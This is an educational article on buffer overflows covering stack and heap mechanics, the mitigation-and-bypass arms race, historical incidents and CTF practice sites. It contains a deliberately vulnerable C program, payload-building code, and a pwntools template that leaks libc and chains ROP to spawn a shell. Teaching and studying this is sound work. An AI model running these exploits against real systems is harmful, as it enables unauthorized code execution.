Buffer Overflow #
Buffer Overflow (BOF) is the classic among classics of memory-safety vulnerabilities: writing past the end of an allocated buffer and corrupting adjacent memory. From the 1988 Morris Worm that pivoted on gets() in fingerd to take down the early Internet, through Code Red, Slammer, Heartbleed, and the 2024 glibc CVE-2024-2961, most of the major Internet-scale incidents of the past 35 years have involved this vulnerability class.
It's tempting to think "we live in the Rust/Go era, so surely this is a solved problem?" The published numbers say otherwise: the Microsoft Security Response Center has reported that about 70% of the CVEs it assigns are memory-safety bugs, and Google's Chromium team has reported a similar share (about 70%) of its high-severity security bugs. Linux kernel / Windows internals / Chrome / Firefox / OpenSSL / FFmpeg / postfix: most of the foundational code carrying modern infrastructure is still C/C++, and new memory-safety CVEs ship monthly.
The goal of this article: dissect how a BOF actually happens in one diagram, and lay out the mitigation/bypass arms race in another. The order is stack BOF mechanics → heap BOF overview → shellcode injection → mitigations vs. bypasses → historical incidents → legitimate places to learn.
1. Why BOF is still load-bearing today #
The reason BOF is still a live vulnerability class traces back to the foundational design of C/C++:
- No bounds checking on array access: neither compiler nor runtime stops buf[1000000]
- strcpy, gets, sprintf, etc. take no destination-size parameter, and memcpy's length is never checked against the destination: APIs that trust input length
- Pointers can address anything: out-of-range reads/writes and allocator-bypassing access are both possible
- No compile-time tracking of memory ownership: use-after-free and double-free aren't statically prevented
Memory-safe languages (Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript) structurally prevent these by having the compiler or runtime check. But the vast majority of foundational code is still C/C++, and the rewrite cost is enormous, so the realistic choice has been to keep it alive with mitigations. Long-running rewrite projects (Rust adoption in the Linux kernel since 2022, Rust components in the Windows kernel at Microsoft, "new Android native code goes in Rust") are all in motion. Even so, complete replacement is widely understood to take 20+ more years.
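The difference between "trusts the input length" and "the runtime checks" can be modelled without any C. The sketch below is a toy model, not real process memory: a `bytearray` stands in for a flat region in which an 8-byte buffer sits directly in front of a one-byte `is_admin` flag. The names, sizes, and layout are illustrative assumptions.

```python
# Toy model of adjacent memory: NOT real process memory, just a flat bytearray.
BUF_OFFSET = 0       # hypothetical 8-byte buffer at offset 0
BUF_SIZE = 8
FLAG_OFFSET = 8      # hypothetical one-byte is_admin flag right after it


def new_memory() -> bytearray:
    """Return 16 zeroed bytes: buf[8], is_admin, then padding."""
    return bytearray(16)


def unchecked_copy(mem: bytearray, data: bytes) -> None:
    """strcpy-like: trusts len(data) and never consults BUF_SIZE."""
    for i, byte in enumerate(data):
        mem[BUF_OFFSET + i] = byte


def checked_copy(mem: bytearray, data: bytes) -> None:
    """What a bounds-checking runtime does: reject oversized input."""
    if len(data) > BUF_SIZE:
        raise ValueError(f"{len(data)} bytes do not fit in a {BUF_SIZE}-byte buffer")
    mem[BUF_OFFSET:BUF_OFFSET + len(data)] = data


mem = new_memory()
unchecked_copy(mem, b"A" * 8 + b"\x01")   # the ninth byte lands on is_admin
print("is_admin after unchecked copy:", mem[FLAG_OFFSET])

mem = new_memory()
try:
    checked_copy(mem, b"A" * 8 + b"\x01")
except ValueError as err:
    print("checked copy refused:", err)
print("is_admin after checked copy:", mem[FLAG_OFFSET])
```

The unchecked version silently flips the flag; the checked version fails loudly and leaves the neighbor untouched, which is the whole trade a memory-safe language makes.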
2. Stack-based BOF — what's actually happening behind a function call #
The most classic case, stack-based buffer overflow, requires dissecting the stack frame at function-call time. The relative position of local-variable buffers and the saved return address is the ignition point.
The minimal vulnerable program and the exploit flow:
// vulnerable.c: classic stack BOF
#include <string.h>
#include <stdio.h>

void vulnerable(char *input) {
    char buf[64];           // 64 bytes on the stack
    strcpy(buf, input);     // ★ no size check → over 64 bytes corrupts saved RIP
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}
# Build with mitigations off (modern OSes still apply runtime mitigations on top)
gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable
# Distance to saved RIP: typically buf + saved RBP = 64 + 8 = 72 bytes
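./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")') # → segfault on ret: the saved-RIP slot now holds 0x4242424242424242
# (that address is non-canonical on x86-64, so the fault is raised at the ret itself and a debugger shows RIP still pointing there)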
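The 64 + 8 = 72 arithmetic can be checked on a model of the frame. This is a sketch under the simplest possible assumption (buf sits directly below saved RBP, with no padding and no canary), which real compilers do not guarantee; the original RBP and RIP values are made up for illustration.

```python
import struct

BUF_SIZE = 64                                # char buf[64]
SAVED_RBP_SIZE = 8                           # pointer size on x86-64
OFFSET_TO_RIP = BUF_SIZE + SAVED_RBP_SIZE    # 72

# Hypothetical values the frame holds before the overflow.
ORIGINAL_RBP = 0x7FFFFFFFE000
ORIGINAL_RIP = 0x401196


def make_frame() -> bytearray:
    """Model: [ buf (64) | saved RBP (8) | saved RIP (8) ], low to high address."""
    return bytearray(BUF_SIZE) + struct.pack("<QQ", ORIGINAL_RBP, ORIGINAL_RIP)


def strcpy_model(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame with no length check, like strcpy."""
    frame[0:len(data)] = data


def saved_rip(frame: bytearray) -> int:
    """Read the 8-byte little-endian return-address slot."""
    return struct.unpack_from("<Q", frame, OFFSET_TO_RIP)[0]


frame = make_frame()
strcpy_model(frame, b"A" * OFFSET_TO_RIP + b"B" * 8)
print(hex(saved_rip(frame)))   # 0x4242424242424242
```

With 64 bytes or fewer the return-address slot is untouched; bytes 73 to 80 of the input are exactly what `ret` will pop.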
The classification of "what the attacker stuffs into the input":
- Shellcode injection: fill buf with shellcode (a few dozen bytes of asm that spawns /bin/sh) and put "buf's own address" at the saved-RIP slot. Defeated by NX (DEP)
- ret2libc: point saved RIP at libc's system() and pass the address of /bin/sh as the argument. Defeated by ASLR
- ROP (Return-Oriented Programming): chain together pre-existing code fragments (gadgets) ending in ret to build arbitrary behavior. The mainstream of modern BOF exploits
- JOP / SROP / COOP: variants of ROP
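What a ret2libc payload looks like as bytes, in a minimal sketch. On x86-64 the first argument travels in RDI, so even plain ret2libc needs one small gadget to load it, which is why the line between ret2libc and ROP is blurry in practice. Every address below is a placeholder chosen for illustration, not a value from any real binary or libc.

```python
import struct

OFFSET_TO_RIP = 72   # 64-byte buf + 8-byte saved RBP, as in the example above

# Placeholder addresses for illustration only; real values come from the
# target binary and its libc (and move on every run under ASLR).
POP_RDI_RET = 0x401233        # hypothetical "pop rdi; ret" gadget
BIN_SH_STR = 0x7FFFF7F5A678   # hypothetical address of the "/bin/sh" string
SYSTEM_FN = 0x7FFFF7E15D70    # hypothetical address of system()


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes (the job pwntools' p64 does)."""
    return struct.pack("<Q", value)


def build_ret2libc_chain() -> bytes:
    """Layout: padding | pop rdi; ret | &"/bin/sh" | &system"""
    return (
        b"A" * OFFSET_TO_RIP
        + p64(POP_RDI_RET)    # overwrites saved RIP: first "return" lands here
        + p64(BIN_SH_STR)     # popped into RDI by the gadget
        + p64(SYSTEM_FN)      # the gadget's ret jumps to system("/bin/sh")
    )


payload = build_ret2libc_chain()
print(len(payload), payload[OFFSET_TO_RIP:].hex())
```

One caveat when mapping this back to vulnerable.c: strcpy stops at the first NUL byte, and 64-bit addresses usually contain zero bytes, so a chain like this models an overflow through a length-based copy such as read() rather than through strcpy itself.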
3. Heap-based BOF — corrupting chunk metadata #
A BOF in a buffer allocated with malloc() / new (the heap) is heap-based BOF. It can't seize PC as directly as a stack BOF, but corrupting the heap allocator's bookkeeping metadata can be promoted to arbitrary memory write (write-what-where).
In glibc's malloc (ptmalloc2), each chunk starts with a [prev_size | size | data...] header, and free chunks in the regular bins are linked in a doubly linked list through fd / bk pointers stored at the start of the data area. A heap BOF that rewrites the fd / bk pointers of the next chunk causes a subsequent unlink() to perform a write at an attacker-chosen address (the classic "unlink attack").
Modern glibc piles consistency checks on unlink(), but House of Force / House of Spirit / fastbin dup / tcache poisoning / large bin attack — a different technique per generation — keep being researched and published. The glibc 2.35+ tcache family is an especially active target.
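The unlink write primitive and the consistency check that closed it can be sketched on a toy address space. This is a model of the idea, not glibc's code: `Memory` is a hypothetical sparse word store, the chunk, target, and value addresses are invented, and only the fd/bk offsets (16 and 24 on 64-bit) follow the real chunk layout.

```python
FD_OFF = 16   # offset of fd inside a free chunk on 64-bit glibc
BK_OFF = 24   # offset of bk


class Memory:
    """Sparse 64-bit word store standing in for the process address space."""

    def __init__(self):
        self.words = {}

    def read(self, addr: int) -> int:
        return self.words.get(addr, 0)

    def write(self, addr: int, value: int) -> None:
        self.words[addr] = value


def unlink_legacy(mem: Memory, p: int) -> None:
    """Pre-hardening unlink: trusts whatever fd/bk currently hold."""
    fd = mem.read(p + FD_OFF)
    bk = mem.read(p + BK_OFF)
    mem.write(fd + BK_OFF, bk)   # FD->bk = BK
    mem.write(bk + FD_OFF, fd)   # BK->fd = FD


def unlink_checked(mem: Memory, p: int) -> None:
    """Hardened unlink: both neighbours must still point back at p."""
    fd = mem.read(p + FD_OFF)
    bk = mem.read(p + BK_OFF)
    if mem.read(fd + BK_OFF) != p or mem.read(bk + FD_OFF) != p:
        raise RuntimeError("corrupted double-linked list")
    mem.write(fd + BK_OFF, bk)
    mem.write(bk + FD_OFF, fd)


def corrupt_chunk(mem: Memory, p: int, target: int, value: int) -> None:
    """What the heap overflow achieves: attacker-chosen fd/bk in chunk p."""
    mem.write(p + FD_OFF, target - BK_OFF)   # so that FD->bk lands on target
    mem.write(p + BK_OFF, value)


CHUNK, TARGET, VALUE = 0x602000, 0x601018, 0x400DEAD   # all hypothetical

mem = Memory()
corrupt_chunk(mem, CHUNK, TARGET, VALUE)
unlink_legacy(mem, CHUNK)
print(hex(mem.read(TARGET)))   # 0x400dead: write-what-where achieved

mem = Memory()
corrupt_chunk(mem, CHUNK, TARGET, VALUE)
try:
    unlink_checked(mem, CHUNK)
except RuntimeError as err:
    print("blocked:", err)
```

The legacy path also writes `fd` to `value + 16` as a side effect, which is why the classic attack needed the written value to point at writable memory.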
Beyond heap BOF, important neighboring memory-safety bugs:
- Use-After-Free (UAF): using a pointer after free() → the memory has been reallocated, so writes corrupt other data
- Double Free: free()-ing the same pointer twice → free list corruption
- Type Confusion: treating an object as the wrong type (frequent in C++ vtables)
- Out-of-Bounds Read: Heartbleed (CVE-2014-0160) is this. Not a write, but a read leaks adjacent memory
All trace back to the same root: the compiler doesn't check pointer validity.
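The out-of-bounds read case is the easiest of these to model. The sketch below mimics the shape of the Heartbleed bug, not OpenSSL's actual code: a heartbeat reply echoes as many bytes as the peer claims to have sent. The function names, the `memory` layout, and the "secret" are illustrative assumptions.

```python
def heartbeat_vulnerable(memory: bytes, payload_offset: int, claimed_len: int) -> bytes:
    """Echo claimed_len bytes from the payload start, trusting the peer's length field."""
    return memory[payload_offset:payload_offset + claimed_len]


def heartbeat_fixed(memory: bytes, payload_offset: int,
                    actual_len: int, claimed_len: int) -> bytes:
    """Discard the request when the claimed length exceeds what was received."""
    if claimed_len > actual_len:
        return b""
    return memory[payload_offset:payload_offset + claimed_len]


# Toy process memory: a 4-byte heartbeat payload followed by unrelated data.
payload = b"bird"
secret = b"PRIVATE-KEY-MATERIAL"   # hypothetical neighbouring heap contents
memory = payload + secret

print(heartbeat_vulnerable(memory, 0, 4))                  # honest request
print(heartbeat_vulnerable(memory, 0, 24))                 # lying request leaks the neighbour
print(heartbeat_fixed(memory, 0, len(payload), 24))        # fixed: silently dropped
```

Nothing is overwritten and nothing crashes, which is why this class of bug can be exploited repeatedly without leaving obvious traces.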
4. Mitigations vs. bypasses — the arms race #
BOF can't be completely eliminated, so OSes, compilers, and CPUs have layered mitigations on top. Each mitigation has a bypass — knowing the chain is the key to understanding why modern exploits look so complex.
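One round of that mitigation/bypass chain, using the stack canary (SSP) as the example. This is a sketch of the idea only: the frame layout, the saved RBP/RIP values, and the function names are assumptions, and the "epilogue" stands in for the compiler-inserted check that calls `__stack_chk_fail`.

```python
import os
import struct

BUF_SIZE = 64
FRAME_SIZE = BUF_SIZE + 8 + 8 + 8   # buf | canary | saved RBP | saved RIP


def new_canary() -> bytes:
    """Random 8-byte value whose first byte in memory is NUL, as on x86-64 glibc."""
    return b"\x00" + os.urandom(7)


def make_frame(canary: bytes) -> bytearray:
    """Model: [ buf (64) | canary (8) | saved RBP (8) | saved RIP (8) ]."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<QQ", 0x7FFFFFFFE000, 0x401196)


def function_epilogue(frame: bytearray, canary: bytes) -> int:
    """Check the canary before 'returning'; abort on mismatch."""
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        raise RuntimeError("*** stack smashing detected ***")
    return struct.unpack_from("<Q", frame, BUF_SIZE + 16)[0]   # saved RIP


canary = new_canary()

# Mitigation: a linear overflow must trample the canary to reach saved RIP.
frame = make_frame(canary)
frame[0:FRAME_SIZE] = b"A" * FRAME_SIZE
try:
    function_epilogue(frame, canary)
except RuntimeError as err:
    print(err)

# Bypass: once an info leak reveals the canary, the overflow writes it back.
frame = make_frame(canary)
frame[0:FRAME_SIZE] = b"A" * BUF_SIZE + canary + b"B" * 8 + struct.pack("<Q", 0x4141414141414141)
print(hex(function_epilogue(frame, canary)))   # 0x4141414141414141
```

The same pattern repeats for the other mitigations: each one removes a degree of freedom, and a leak or a second primitive gives it back.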
# Check a binary's mitigations at a glance
checksec --file=./vulnerable
# Sample output (from a fully hardened binary; the mitigations-off build above would report these as disabled):
# RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY
# Full RELRO Canary found NX enab. PIE en. No RPATH No RUNPATH No symbols Yes
# From Python via pwntools
python3 -c 'from pwn import ELF; print(ELF("./vulnerable", checksec=False).checksec())'
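PIE and ASLR randomize where code and libraries are loaded, but each module moves as one block, so a single leaked pointer is enough to recover everything else in it. A worked sketch of that arithmetic follows; the symbol offsets and the leaked value are invented for illustration and do not correspond to any particular libc build.

```python
PAGE_SIZE = 0x1000

# Hypothetical symbol offsets inside one specific libc build; real values
# come from that build's symbol table.
LIBC_OFFSETS = {"puts": 0x80E50, "system": 0x50D70}


def libc_base_from_leak(leaked_addr: int, symbol: str) -> int:
    """ASLR shifts the whole library by one random base, so base = leak - offset."""
    base = leaked_addr - LIBC_OFFSETS[symbol]
    if base % PAGE_SIZE != 0:
        raise ValueError("base is not page-aligned; wrong libc or wrong leak")
    return base


def resolve(base: int, symbol: str) -> int:
    """Runtime address of any other symbol once the base is known."""
    return base + LIBC_OFFSETS[symbol]


leaked_puts = 0x7F3A1C280E50   # hypothetical value obtained through an info leak
base = libc_base_from_leak(leaked_puts, "puts")
print(hex(base), hex(resolve(base, "system")))   # 0x7f3a1c200000 0x7f3a1c250d70
```

The page-alignment check is a cheap sanity test exploit authors commonly use: a base that is not page-aligned usually means the offsets belong to a different libc version than the target's.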
"All mitigations on" ≠ "unexploitable." Combine one info leak (= an arbitrary-address read) with one BOF and modern exploits routinely punch through every defense. The best evidence: Pwn2Own sees full sandbox escapes against Chrome / Safari / iOS / Windows kernel several times a year. Mitigations make the wall taller; they don't make it impassable.
5. Historical incidents — the BOFs that changed the world #
Most of the Internet-scale incidents are BOF or its memory-safety neighbors:
| Year | Incident | Mechanism | Impact |
|---|---|---|---|
| 1988 | Morris Worm | Stack BOF in fingerd's gets() + sendmail debug + rsh brute force | Took down ~10% of the Internet. First Internet worm; led to the founding of CERT |
| 1996 | Aleph One "Smashing the Stack" (Phrack 49) | The first textbook-grade explanation of stack BOF and shellcode | The starting point of modern exploitation. Still required reading |
| 2001 | Code Red (CVE-2001-0500) | BOF in IIS Index Server | 350,000 Windows servers infected, designed to DDoS the White House |
| 2003 | Slammer (SQL Slammer) (CVE-2002-0649) | A 376-byte UDP BOF packet against MS SQL Server 2000 | 75,000 hosts in 10 minutes, choked global Internet bandwidth, ATMs went down |
| 2014 | Heartbleed (CVE-2014-0160) | TLS heartbeat out-of-bounds READ in OpenSSL (BOF cousin) | 17% of HTTPS servers leaked private keys / sessions / passwords. A worldwide cert reissue event |
| 2017 | WannaCry / EternalBlue (CVE-2017-0144) | Heap overflow during SMBv1 struct parsing | 200,000+ Windows hosts hit by ransomware. NHS / rail / car factories went offline |
| 2024 | glibc CVE-2024-2961 (iconv ISO-2022-CN-EXT) | Out-of-bounds write in glibc internal buffer | Combined with PHP filter chains for RCE PoCs, exploitable in multiple web apps |
The fact that memory-safety vulnerabilities haven't gone away in 30+ years is a major reason Microsoft and Google are moving new code to Rust. Rust adoption in the Linux kernel (2022), partial Windows kernel rewrites in Rust, and "new Android native code defaults to Rust" are all consequences of the same realization.
6. Where to learn — legitimate practice grounds #
Trying it on someone else's system = a crime under unauthorized-access law. Learn on environments deliberately built to be vulnerable — that's the right entry point:
| Platform | Contents | Difficulty |
|---|---|---|
| pwn.college | Free university course from ASU. Curriculum from stack BOF → ROP → kernel exploit | Beginner → Advanced |
| pwnable.kr | Korean veteran pwn site. Per-level vulnerable binaries, get a shell | Beginner → Advanced |
| pwnable.tw | Taiwanese advanced pwn site. Heavy on heap and kernel exploit | Intermediate → Expert |
| picoCTF | Carnegie Mellon's beginner CTF. Past problems live forever in PicoGym, lots of pwn | Beginner |
| HackTheBox | General challenges → Pwn category | Beginner → Advanced |
| OverTheWire (Narnia, Behemoth, Vortex) | Classic BOF / format string wargames | Beginner → Intermediate |
| Microcorruption | Matasano's MSP430-based embedded BOF wargame | Beginner → Intermediate |
| Exploit-Education (Phoenix, Nebula) | Successor to exploit-exercises. Series that ratchets up protections incrementally | Beginner → Intermediate |
The tools (all in Kali Linux):
# Dynamic analysis / debuggers
gdb + pwndbg / GEF / peda # Extended GDB (essential for modern pwn)
strace -f ./vulnerable # Syscall trace
ltrace ./vulnerable # Library call trace
# Static analysis / binary tooling
checksec --file=./bin # Show mitigations
ROPgadget --binary ./bin # Enumerate ROP gadgets
ropper --file ./bin # Same idea, different impl
objdump -d ./bin | less # Disassembly
radare2 ./bin / r2 ./bin # Lightweight reverse-engineering platform
ghidra # NSA's GUI decompiler
# Exploit development
python3 + pwntools # The de facto exploit-script library
# = I/O + auto ROP-chain + shellcode + transport wrapper
one_gadget ./libc.so.6 # List "single-address execve('/bin/sh')" sites in libc
A minimal pwntools exploit template:
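from pwn import *
# Template only: assumes a target that reads the payload from stdin, imports puts,
# and contains a "pop rdi; ret" gadget. Adapt the offset and the I/O to the real binary.
context.binary = elf = ELF("./vulnerable")
libc = ELF("./libc.so.6")
p = process("./vulnerable") # locally / remote("host", port) for remote
OFFSET = 72 # padding to saved RIP
# 1. Info-leak the libc base: call puts(puts@got), then return to main for a second round
stage1 = ROP(elf)
stage1.puts(elf.got["puts"])
stage1.raw(elf.sym["main"])
p.sendline(b"A" * OFFSET + stage1.chain())
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"] # rebase libc so later lookups are absolute
# 2. Build a ROP chain against the rebased libc
rop = ROP(libc)
rop.raw(rop.find_gadget(["ret"]).address) # extra ret: keeps the stack 16-byte aligned for system()
rop.system(next(libc.search(b"/bin/sh\x00")))
p.sendline(b"A" * OFFSET + rop.chain())
p.interactive() # got shell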
Don't run this outside of CTFs and practice platforms. Trying it against a live service is illegal the moment you do it. Internal pentesting at your employer requires written authorization (RoE). The same principles as the Kali Linux article's "law and ethics" apply.
Buffer Overflow is the direct consequence of a 1970s language design choice ("C/C++ has no memory bounds checking"), and it has remained one of the principal Internet-scale attack surfaces for 30+ years. Hold stack-BOF mechanics (strcpy clobbers saved RIP → ret hijacks control) and its heap-side evolution (chunk-metadata corruption → write-where) in your head alongside the layered mitigations (SSP / DEP / ASLR / PIE / CFI) and the bypass evolution (ROP / info leak / heap grooming), and you can read any modern memory-safety CVE writeup with a map of the arms race already in hand.
The endgame answer is "rewrite into a memory-safe language," but with complete replacement taking 20+ more years, the honest 2026-era posture is layered defense: enable the mitigation stack correctly (verified with checksec), find memory-safety bugs early via fuzzing, start new projects in Rust / Go, and prefer bounds-checked replacement APIs (strncpy_s / snprintf / Rust wrappers / Google's bounds-checking patches) inside existing C/C++.